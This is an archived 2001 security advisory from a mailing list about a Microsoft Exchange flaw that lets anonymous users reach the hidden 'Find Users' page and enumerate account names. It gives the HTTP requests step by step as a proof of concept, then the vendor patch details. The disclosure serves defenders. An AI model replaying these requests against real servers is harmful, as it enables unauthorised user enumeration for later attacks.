OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Aviram Jenik (aviramBEYONDSECURITY.COM)
Date: Fri Sep 07 2001 - 04:33:16 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    The following security advisory is sent to the securiteam mailing list,
    and
    can be found at the SecuriTeam web site: http://www.securiteam.com

    SUMMARY

    Microsoft Exchange Server handles anonymous access to its Public Folders

    insecurely. While administrators may disable the "Find Users" features
    to
    prevent anonymous users from enumerating existing user names, a security

    flaw in Exchange server allows remote attackers with access to the
    exchange server to run "Find Users".

    DETAILS

    Microsoft Exchange's Public Folders options of "Find Users" can be
    disabled. This, however, does not prevent the users from directly
    accessing the ASP page (fumsg.asp). The link to the "Find Users" will be

    hidden, however it is still possible to programmatically access the
    page.

    Steps to recreate:
    1) Contact:
    GET /exchange/root.asp?acs=anon HTTP/1.1
    Host: www.example.com

    2) Access the redirected page, and resend the issued cookie.
    GET /exchange/logonfrm.asp HTTP/1.1
    Host: www.example.com
    Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN

    3) Access the redirected page, and resend the issued cookie.
    GET /exchange/root.asp?acs=anon HTTP/1.1
    Host: www.example.com
    Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN

    4) Issue this request to obtain a list of users with the letter 'a' in
    their name (e.g. Administrator)
    POST /exchange/finduser/fumsg.asp HTTP/1.1
    Host: www.example.com
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 44
    Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN

    DN=a&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO=

    Vendor status:
    Microsoft has been contacted on August 4, 2001. A security bulletin was
    released on September 7, 2001.

    Solution:
    Microsoft has released a patch for this problem. See
    <http://www.microsoft.com/technet/treeview/default.asp?url=/technet/secu
    rity/bulletin/MS01-047.asp> Microsoft Security Bulletin MS01-047 for
    more information.

    ADDITIONAL INFORMATION
    This security hole was discovered by <mailto:noamrsecuriteam.com> Noam
    Rathaus.
    The information has been provided by <mailto:expertssecuiteam.com>
    SecuriTeam Experts.

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of
    any
    kind.
    In no event shall we be liable for any damages whatsoever including
    direct,
    indirect, incidental, consequential, loss of business profits or special
    damages.

    _____________________________________________________________________
    ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
    ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
    SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net